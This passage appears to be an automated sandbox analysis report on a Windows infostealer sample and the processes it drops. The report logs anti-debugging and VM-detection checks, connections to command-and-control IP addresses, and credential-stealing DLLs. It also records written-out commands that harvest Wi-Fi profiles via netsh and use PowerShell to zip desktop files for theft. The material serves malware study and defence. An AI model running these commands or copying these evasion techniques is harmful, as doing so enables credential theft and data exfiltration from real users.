                              Source: MPGPH131.exe, 0000001C.00000003.2969098995.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}p.
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nickname.utiitsl.comVMware20,1169642865
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: c884f8452a.exe, 00000024.00000003.3078423333.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra Change Transaction PasswordVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o.inVMware20,11696428655~
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: c884f8452a.exe, 00000014.00000003.2910333691.0000000001691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Cry
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                              Source: c884f8452a.exe, 00000014.00000003.2910333691.0000000001691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{`p
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: c884f8452a.exe, 00000014.00000003.2980525075.0000000008111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169642865
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}x
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg>_I
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comVMware20,11696428655o
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: netsh.exe, 00000009.00000002.2741856372.000001F406E37000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2741173735.000001F406E34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MPGPH131.exe, 0000001D.00000002.3253650821.000000000126D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(<+
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000002.3254763388.0000000001304000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9A5A6814
                              Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9A5A6814ZokPL[g
                              Source: c884f8452a.exe, 00000024.00000002.3143187486.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeSystem information queried: CodeIntegrityInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeSystem information queried: CodeIntegrityInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeSystem information queried: CodeIntegrityInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeSystem information queried: CodeIntegrityInformation
                              Hides threads from debuggers
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeThread information set: HideFromDebugger
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebugger
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeThread information set: HideFromDebugger
                              Potentially malicious time measurement code found
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_051F0A3C Start: 051F0B37 End: 051F0AAB0_2_051F0A3C
                              Tries to detect sandboxes and other dynamic analysis tools (window names)
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeOpen window title or class name: gbdyllo
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: procmon_window_class
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: NTICE
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: SICE
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: SIWVID
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess queried: DebugPort
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_051F0CAD rdtsc 0_2_051F0CAD
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00BB7BBB mov eax, dword ptr fs:[00000030h]0_2_00BB7BBB
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00BBB922 mov eax, dword ptr fs:[00000030h]0_2_00BBB922
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0073B922 mov eax, dword ptr fs:[00000030h]2_2_0073B922
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00737BBB mov eax, dword ptr fs:[00000030h]2_2_00737BBB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_0073B922 mov eax, dword ptr fs:[00000030h]3_2_0073B922
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00737BBB mov eax, dword ptr fs:[00000030h]3_2_00737BBB
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_00395E8B mov eax, dword ptr fs:[00000030h]14_2_00395E8B
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_00399B02 mov eax, dword ptr fs:[00000030h]14_2_00399B02
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeMemory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.233.132.56 80
                              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 193.233.132.167 80
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, MainJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, MainJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"Jump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe
                              Source: C:\Windows\System32\rundll32.exeProcess created: unknown unknown
                              Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmp, 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmp, 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, explorha.exe, 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: ;Program Manager
                              Source: amert.exe, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: zProgram Manager
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0037CD47 cpuid 14_2_0037CD47
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
